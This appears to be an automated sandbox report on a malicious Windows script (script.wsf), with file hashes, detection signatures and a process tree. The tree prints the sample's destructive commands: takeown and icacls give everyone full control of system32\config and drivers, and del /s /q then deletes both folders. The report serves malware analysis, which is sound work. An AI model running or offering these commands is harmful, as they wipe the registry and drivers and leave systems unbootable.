Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    15-08-2024 21:30

General

  • Target

    script.wsf

  • Size

    2KB

  • MD5

    cef6ac1c7b72212cb9b26421ba748362

  • SHA1

    05858a591fc90a1af835454aee11b7d893649517

  • SHA256

    92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a

  • SHA512

    435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2636
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2316
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2632
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2772
  • C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T
    1⤵
      PID:2152

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\Temp\thescript.vbs

      Filesize

      2KB

      MD5

      cef6ac1c7b72212cb9b26421ba748362

      SHA1

      05858a591fc90a1af835454aee11b7d893649517

      SHA256

      92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a

      SHA512

      435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c

    • C:\Users\Admin\Desktop\DebugPublish.vbs

      Filesize

      98B

      MD5

      4b91264568ac2162700be36338c095e8

      SHA1

      c95726edf8303e6adabcb12ffdca90b51349990a

      SHA256

      2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037

      SHA512

      e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b